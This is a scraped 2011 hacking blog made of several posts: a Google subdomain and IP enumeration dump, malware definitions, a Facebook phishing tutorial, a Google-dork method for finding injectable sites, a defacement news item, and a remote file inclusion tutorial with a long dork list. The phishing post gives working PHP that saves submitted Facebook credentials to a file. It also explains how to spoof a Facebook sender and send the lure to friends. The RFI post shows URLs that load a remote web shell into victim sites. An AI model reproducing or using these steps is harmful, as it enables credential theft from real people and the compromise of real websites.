<span style="font-size: small;"><b><i>IP Address #2:74.125.47.91</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.47.93</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.47.136</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>proxy.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.169.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:64.233.171.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:64.233.179.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:64.233.183.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #5:64.233.184.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #6:64.233.187.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #7:66.102.0.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #8:66.102.9.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #9:66.102.14.225</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #10:66.102.14.241</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #11:216.239.42.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #12:216.239.53.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #13:216.239.55.5</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #14:216.239.57.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #15:216.239.59.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #16:64.233.161.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #17:64.233.165.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #18:64.233.167.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>research.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>sandbox.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.81</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>search.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>services.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.139.110</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>shopping.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>smtp.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.237.25</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>sms.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>support.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>uploads.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:72.14.243.49</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>vpn.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.9.224.69</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:64.9.224.70</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:64.9.224.68</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www2.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.179.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www3.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.179.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>31 subhost(s) found</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Enjoy, and use it legally in your penetration tests.</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-32420487610514033432011-08-29T02:38:00.000-07:002011-08-29T02:38:07.739-07:00What is a trojan/worm/virus/logic bomb?<div dir="ltr" style="text-align: left;" trbidi="on"><b><span style="font-size: medium; line-height: normal;"><span style="color: red;">Trojan:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
Remember the Trojan Horse? Bad guys hid inside it until they could get <br />
into the city to do their evil deed. A trojan computer program is <br />
similar. It is a program which does an unauthorized function, hidden <br />
inside an authorized program. It does something other than what it <br />
claims to do, usually something malicious (although not necessarily!), <br />
and it is intended by the author to do whatever it does. If it's not <br />
intentional, its called a 'bug' or, in some cases, a feature <img alt=":)" src="http://cyber-security.in/forum/smileys/cutemoticons/smile.png" /> Some <br />
virus scanning programs detect some trojans. Some virus scanning <br />
programs don't detect any trojans. No virus scanners detect all <br />
trojans. <br />
</span></i><b><span style="font-size: medium; line-height: normal;"><span style="color: #00b050;">Virus:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
A virus is an independent program which reproduces itself. It may <br />
attach to other programs, it may create copies of itself (as in <br />
companion viruses). It may damage or corrupt data, change data, or <br />
degrade the performance of your system by utilizing resources such as <br />
memory or disk space. Some virus scanners detect some viruses. No <br />
virus scanners detect all viruses. No virus scanner can protect <br />
against "any and all viruses, known and unknown, now and forevermore". <br />
</span></i><span style="font-size: medium; line-height: normal;"><b><span style="color: #0070c0;">Worm:</span></b></span><i><span style="font-size: medium; line-height: normal;"> <br />
Made famous by Robert Morris, Jr. , worms are programs which reproduce <br />
by copying themselves over and over, system to system, using up <br />
resources and sometimes slowing down the systems. They are self <br />
contained and use the networks to spread, in much the same way viruses <br />
use files to spread. Some people say the solution to viruses and worms <br />
is to just not have any files or networks. They are probably correct. <br />
We would include computers. <br />
</span></i><b><span style="font-size: medium; line-height: normal;"><span style="color: #7030a0;">Logic Bomb:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
Code which will trigger a particular form of 'attack' when a <br />
designated condition is met. For instance, a logic bomb could delete <br />
all files on Dec. 5th. Unlike a virus, a logic bomb does not make <br />
copies of itself. <br />
</span></i> </div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-81775018152919906492011-08-29T02:36:00.000-07:002011-08-29T02:36:27.851-07:00How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><b><span style="font-size: small;">Now im gonna make a step by step tutorial for facebook accounts. <br />
<br />
WITH PICTURES!!! </span><span style="font-size: small;"><br />
<br />
<br />
<br />
ONE!: </span><span style="font-size: small;"><br />
<br />
go to "www.facebook.com/login.php" and right click on some white space </span><span style="font-size: small;"><br />
on the page and press "view source code". ALOT of text is gonna appear, <br />
copy it all to notepad. <br />
<br />
<br />
<br />
TWO!: </span><span style="font-size: small;"><br />
<br />
Now we need to change a few things in the code. So that the login button </span><span style="font-size: small;"><br />
sends the info to our file instead of the facebook login. We do that by <br />
editing the action of the code. So press Edit >> search. and <br />
search "action=" without the quotes. you should find this <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://img354.imageshack.us/img354/7116/screen1pf8.png" /></span> <span style="font-size: small;"><br />
<br />
The big red ring that circles the "action=" you have to change. You have </span><span style="font-size: small;"><br />
to change it to 'action="next.php" '. after you have done that, you <br />
should change the method (small red circle on the picture) to "get" <br />
instead of "post", or else it will not work. Save the document as <br />
"index.PHP" (not htm!) <br />
<br />
<br />
<br />
THREE!: </span><span style="font-size: small;"><br />
<br />
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this: </span><span style="font-size: small;"><br />
<br />
</span> <span style="font-size: small;"> <br />
<br />
<br />
<br />
<?php <br />
<br />
header("Location: </span><span style="font-size: small;"><a href="http://www.facebook.com/login.php" target="_blank">http://www.Facebook.com/login.php</a> "); <br />
<br />
$handle = fopen("passwords.txt", "a"); </span><span style="font-size: small;"><br />
<br />
foreach($_GET as $variable => $value) { </span><span style="font-size: small;"><br />
<br />
fwrite($handle, $variable); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "="); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, $value); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "\r\n"); </span><span style="font-size: small;"><br />
<br />
} </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "\r\n"); </span><span style="font-size: small;"><br />
<br />
fclose($handle); </span><span style="font-size: small;"><br />
<br />
exit; </span><span style="font-size: small;"><br />
<br />
?> </span><span style="font-size: small;"><br />
<br />
<br />
<br />
Save this as "next.php" <br />
<br />
<br />
<br />
Note: for security you should rename "passwords.txt" to something else. </span><span style="font-size: small;"><br />
<br />
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank. </span><span style="font-size: small;"><br />
<br />
<br />
<br />
FOUR!: </span><span style="font-size: small;"><br />
<br />
Upload the 3 files "index.php", "next.php" and "passwords.txt" (or </span><span style="font-size: small;"><br />
whatever the password file is called) to a subdomain hosting site. THEY <br />
MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com. <br />
When you made an account you should upload the 3 files. <br />
<br />
<br />
<br />
Congratz. You have yourself a working Phisher site! </span><span style="font-size: small;"><br />
<br />
<br />
<br />
FIVE!: </span><span style="font-size: small;"><br />
<br />
now we would like to send spoof emails out. To do that we should first </span><span style="font-size: small;"><br />
make an email account. which starts with facebook@. or something that <br />
looks alike. like this <a href="mailto:FACEB0OK@hotmail.com" target="_blank">FACEB0OK@hotmail.com</a> or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six. <br />
<br />
<br />
<br />
SIX!: </span><span style="font-size: small;"><br />
<br />
Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET! </span><span style="font-size: small;"><br />
<br />
remove the hyperlink from this link: </span><span style="font-size: small;"><br />
<br />
http:/www.facebook.com/n/?reqs.php </span><span style="font-size: small;"><br />
<br />
Mark it and push the Add hyperlink button </span><span style="font-size: small;"><br />
<br />
<br />
<br />
<img alt="Board Image" src="http://img117.imageshack.us/img117/6243/screen2jj5.png" /></span> <span style="font-size: small;"><br />
<br />
<br />
<br />
Add hyperlink button in the red circle. now write your phisher page url </span><span style="font-size: small;"><br />
in the hyperlink bar that appears after clicking the button. and click <br />
add. The hyperlink should still display <br />
http:/www.facebook.com/n/?reqs.php <br />
<br />
but lead to your phisher page.. Thats pretty kewl. Now i belive your </span><span style="font-size: small;"><br />
ready to send your spoof emails to everybody you know. and hopefully <br />
some of them will fall for it. </span></b> </div></div>Unknownnoreply@blogger.com135tag:blogger.com,1999:blog-3299468824600484367.post-22874816689964548252011-08-29T02:34:00.001-07:002011-08-29T02:34:38.845-07:00How to search Vulnerable site<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>1-) First go to <a href="http://www.google.com/" target="_blank">http://www.google.com</a></b> <b><br />
<br />
<br />
</b> <b>2-) Press on the right, next to the textfield, on "Advanced Search". <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://i47.tinypic.com/2nbf67c.png" /></b> <b><br />
<br />
<br />
</b> <b>3-) Fill in your dork at "This exact wording or phrase". <br />
</b> <b> Results per page: 100 results (Or less depending on your internet speed.) <br />
</b> <b> Language: Could be all languages or one language. I choose Dutch <br />
because I'm Dutch myself and I got a Dutch ISP so those sites will load <br />
faster. <br />
</b> <b> Where your keywords show up: "in the URL of the page" <br />
<br />
<br />
</b> <b>4-) Press search. <br />
<br />
<br />
</b> <b>5-) Now we get this: <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://i47.tinypic.com/2z5uqvl.png" /></b> <b><br />
<br />
<br />
</b> <b>6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab. <br />
<br />
<br />
</b> <b>7-) Open the tabs and add as example a single quote behind the link. <br />
<br />
<br />
</b> <b>8-) If it's vulnerable continue your injection else repeat step 5 -> 6. <br />
<br />
<br />
<br />
Very easy (: </b><b><br />
<br />
With this method I can find about 30 vulnerable websites in less than 2 hours and a few websites to upload a shell to. </b></span> </div></div>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-3299468824600484367.post-75990331509118403992011-08-27T22:05:00.001-07:002011-08-27T22:05:25.046-07:00Apple Website Hacked by HodLuM<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;"><span class="Apple-style-span" style="font-size: medium;"><b><span class="Apple-style-span" style="color: red;"></span></b></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxUi4xMDAgNcYylb7ocQHV3CqZe4ajA4v_sKMyyOdt9ZxYs6eLfHyY4ECBgbDwHDu59EwZaotzBZXkJI_AAHGJmyZ_laAJYhzBS9FyKtAPeT7tjgZsPNLhmNW12MOi6iOACb_wbTMub9k/s1600/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxUi4xMDAgNcYylb7ocQHV3CqZe4ajA4v_sKMyyOdt9ZxYs6eLfHyY4ECBgbDwHDu59EwZaotzBZXkJI_AAHGJmyZ_laAJYhzBS9FyKtAPeT7tjgZsPNLhmNW12MOi6iOACb_wbTMub9k/s640/Untitled.png" width="616" /></a></div><br />
</div>One of the Apple <a href="http://edseminars.apple.com/seminars/eventfiles/668/0wnz.jpg"><b>Sub-Domain</b></a> claimed to be Defaced By <b><span class="Apple-style-span" style="color: #990000;">HodLuM</span></b> as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "<b>N00BZ</b>" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster <a href="http://www.thehackernews.com/2011/08/aol-postmaster-website-hacked-by-hodlum.html">Website</a> was also got hacked by HODLUM some months before.</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-45705076881996861542011-08-27T21:40:00.000-07:002011-08-27T21:40:18.067-07:00RFI - Remote File Inclusion.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Today I will be teaching you guys RFI (Remote File Inclusion).<br />
<br />
<span style="text-decoration: underline;">What is RFI?</span> <br />
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely.<br />
<br />
<span style="text-decoration: underline;">What makes a page vulnerable?</span> <br />
A PHP include script looks like this.<br />
<br />
</b></span> </div><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
include($_GET['p']<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Since the code uses 'p' the syntax would be:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
If the script looks like this:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
include($_GET['lulz']);<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
The syntax would then be:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Understood?<br />
<br />
<span style="text-decoration: underline;">What can I accomplish with RFI?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
You can include your PHP shells onto the website (GNYShell, C99, etc).<br />
You can include just about any file onto the website.<br />
<br />
<span style="text-decoration: underline;">How can I search for RFI vulnerable sites?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Using dorks, exploit scanners, etc.<br />
<br />
Here is a list of RFI dorks:</span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
</span><span style="color: #666666;"> </span></b></span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>inurl:/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
inurl:/include/new-visitor.inc.php?lvc_include_dir=<br />
<br />
inurl:/_functions.php?prefix=<br />
<br />
inurl:/cpcommerce/_functions.php?prefix=<br />
<br />
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
inurl:/modules/agendax/addevent.inc.php?agendax_path=<br />
<br />
inurl:/ashnews.php?pathtoashnews=<br />
<br />
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=<br />
<br />
inurl:/pm/lib.inc.php?pm_path=<br />
<br />
inurl:/b2-tools/gm-2-b2.php?b2inc=<br />
<br />
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
inurl:/modules/agendax/addevent.inc.php?agendax_path=<br />
<br />
inurl:/includes/include_once.php?include_file=<br />
<br />
inurl:/e107/e107_handlers/secure_img_render.php?p=<br />
<br />
inurl:/shoutbox/expanded.php?conf=<br />
<br />
inurl:/main.php?x=<br />
<br />
inurl:/myPHPCalendar/admin.php?cal_dir=<br />
<br />
inurl:/index.php/main.php?x=<br />
<br />
inurl:/index.php?include=<br />
<br />
inurl:/index.php?x=<br />
<br />
inurl:/index.php?open=<br />
<br />
inurl:/index.php?visualizar=<br />
<br />
inurl:/template.php?pagina=<br />
<br />
inurl:/index.php?pagina=<br />
<br />
inurl:/index.php?inc=<br />
<br />
inurl:/includes/include_onde.php?include_file=<br />
<br />
inurl:/index.php?page=<br />
<br />
inurl:/index.php?pg=<br />
<br />
inurl:/index.php?show=<br />
<br />
inurl:/index.php?cat=<br />
<br />
inurl:/index.php?file=<br />
<br />
inurl:/db.php?path_local=<br />
<br />
inurl:/index.php?site=<br />
<br />
inurl:/htmltonuke.php?filnavn=<br />
<br />
inurl:/livehelp/inc/pipe.php?HCL_path=<br />
<br />
inurl:/hcl/inc/pipe.php?HCL_path=<br />
<br />
inurl:/inc/pipe.php?HCL_path=<br />
<br />
inurl:/support/faq/inc/pipe.php?HCL_path=<br />
<br />
inurl:/help/faq/inc/pipe.php?HCL_path=<br />
<br />
inurl:/helpcenter/inc/pipe.php?HCL_path=<br />
<br />
inurl:/live-support/inc/pipe.php?HCL_path=<br />
<br />
inurl:/gnu3/index.php?doc=<br />
<br />
inurl:/gnu/index.php?doc=<br />
<br />
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=<br />
<br />
inurl:/forum/install.php?phpbb_root_dir=<br />
<br />
inurl:/includes/calendar.php?phpc_root_path=<br />
<br />
inurl:/includes/setup.php?phpc_root_path=<br />
<br />
inurl:/inc/authform.inc.php?path_pre=<br />
<br />
inurl:/include/authform.inc.php?path_pre=<br />
<br />
inurl:index.php?nic=<br />
<br />
inurl:index.php?sec=<br />
<br />
inurl:index.php?content=<br />
<br />
inurl:index.php?link=<br />
<br />
inurl:index.php?filename=<br />
<br />
inurl:index.php?dir=<br />
<br />
inurl:index.php?document=<br />
<br />
inurl:index.php?view=<br />
<br />
inurl:*.php?sel=<br />
<br />
inurl:*.php?session=&content=<br />
<br />
inurl:*.php?locate=<br />
<br />
inurl:*.php?place=<br />
<br />
inurl:*.php?layout=<br />
<br />
inurl:*.php?go=<br />
<br />
inurl:*.php?catch=<br />
<br />
inurl:*.php?mode=<br />
<br />
inurl:*.php?name=<br />
<br />
inurl:*.php?loc=<br />
<br />
inurl:*.php?f=<br />
<br />
inurl:*.php?inf=<br />
<br />
inurl:*.php?pg=<br />
<br />
inurl:*.php?load=<br />
<br />
inurl:*.php?naam=<br />
<br />
allinurl:/index.php?page= site:*.dk<br />
<br />
allinurl:/index.php?file= site:*.dk<br />
<br />
INURL OR ALLINURL WITH:<br />
<br />
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=<br />
<br />
/includes/header.php?systempath=<br />
<br />
/Gallery/displayCategory.php?basepath=<br />
<br />
/index.inc.php?PATH_Includes=<br />
<br />
/ashnews.php?pathtoashnews=<br />
<br />
/ashheadlines.php?pathtoashnews=<br />
<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/demo/includes/init.php?user_inc=<br />
<br />
/jaf/index.php?show=<br />
<br />
/inc/shows.inc.php?cutepath=<br />
<br />
/poll/admin/common.inc.php?base_path=<br />
<br />
/pollvote/pollvote.php?pollname=<br />
<br />
/sources/post.php?fil_config=<br />
<br />
/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
/bb_lib/checkdb.inc.php?libpach=<br />
<br />
/include/livre_include.php?no_connect=lol&chem_absolu=<br />
<br />
/index.php?from_market=Y&pageurl=<br />
<br />
/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
/pivot/modules/module_db.php?pivot_path=<br />
<br />
/modules/4nAlbum/public/displayCategory.php?basepath=<br />
<br />
/derniers_commentaires.php?rep=<br />
<br />
/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
/modules/coppermine/include/init.inc.php?CPG_M_DIR=<br />
<br />
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=<br />
<br />
/coppermine/themes/maze/theme.php?THEME_DIR=<br />
<br />
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br />
<br />
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=<br />
<br />
/myPHPCalendar/admin.php?cal_dir=<br />
<br />
/agendax/addevent.inc.php?agendax_path=<br />
<br />
/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/main.php?page=<br />
<br />
/default.php?page=<br />
<br />
/index.php?action=<br />
<br />
/index1.php?p=<br />
<br />
/index2.php?x=<br />
<br />
/index2.php?content=<br />
<br />
/index.php?conteudo=<br />
<br />
/index.php?cat=<br />
<br />
/include/new-visitor.inc.php?lvc_include_dir=<br />
<br />
/modules/agendax/addevent.inc.php?agendax_path=<br />
<br />
/shoutbox/expanded.php?conf=<br />
<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/pivot/modules/module_db.php?pivot_path=<br />
<br />
/library/editor/editor.php?root=<br />
<br />
/library/lib.php?root=<br />
<br />
/e107/e107_handlers/secure_img_render.php?p=<br />
<br />
/zentrack/index.php?configFile=<br />
<br />
/main.php?x=<br />
<br />
/becommunity/community/index.php?pageurl=<br />
<br />
/GradeMap/index.php?page=<br />
<br />
/index4.php?body=<br />
<br />
/side/index.php?side=<br />
<br />
/main.php?page=<br />
<br />
/es/index.php?action=<br />
<br />
/index.php?sec=<br />
<br />
/index.php?main=<br />
<br />
/index.php?sec=<br />
<br />
/index.php?menu=<br />
<br />
/html/page.php?page=<br />
<br />
/page.php?view=<br />
<br />
/index.php?menu=<br />
<br />
/main.php?view=<br />
<br />
/index.php?page=<br />
<br />
/content.php?page=<br />
<br />
/main.php?page=<br />
<br />
/index.php?x=<br />
<br />
/main_site.php?page=<br />
<br />
/index.php?L2=<br />
<br />
/content.php?page=<br />
<br />
/main.php?page=<br />
<br />
/index.php?x=<br />
<br />
/main_site.php?page=<br />
<br />
/index.php?L2=<br />
<br />
/index.php?show=<br />
<br />
/tutorials/print.php?page=<br />
<br />
/index.php?page=<br />
<br />
/index.php?level=<br />
<br />
/index.php?file=<br />
<br />
/index.php?inter_url=<br />
<br />
/index.php?page=<br />
<br />
/index2.php?menu=<br />
<br />
/index.php?level=<br />
<br />
/index1.php?main=<br />
<br />
/index1.php?nav=<br />
<br />
/index1.php?link=<br />
<br />
/index2.php?page=<br />
<br />
/index.php?myContent=<br />
<br />
/index.php?TWC=<br />
<br />
/index.php?sec=<br />
<br />
/index1.php?main=<br />
<br />
/index2.php?page=<br />
<br />
/index.php?babInstallPath=<br />
<br />
/main.php?body=<br />
<br />
/index.php?z=<br />
<br />
/main.php?view=<br />
<br />
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br />
<br />
/index.php?file=<br />
<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
1. allinurl:my_egallery site:.org<br />
/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
2. allinurl:xgallery site:.org<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
3. allinurl:coppermine site:.org<br />
/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
4. allinurl:4nAlbum site:.org<br />
/modules/4nAlbum/public/displayCategory.php?basepath=<br />
<br />
5. allinurlP:NphpBB2 site:.org<br />
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br />
<br />
6. allinurl:ihm.php?p=<br />
<br />
7. Keyword : "powered by AllMyLinks"<br />
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br />
<br />
8. allinurl:/modules.php?name=allmyguests<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
9. allinurl:/Popper/index.php?<br />
/Popper/index.php?childwindow.inc.php?form=<br />
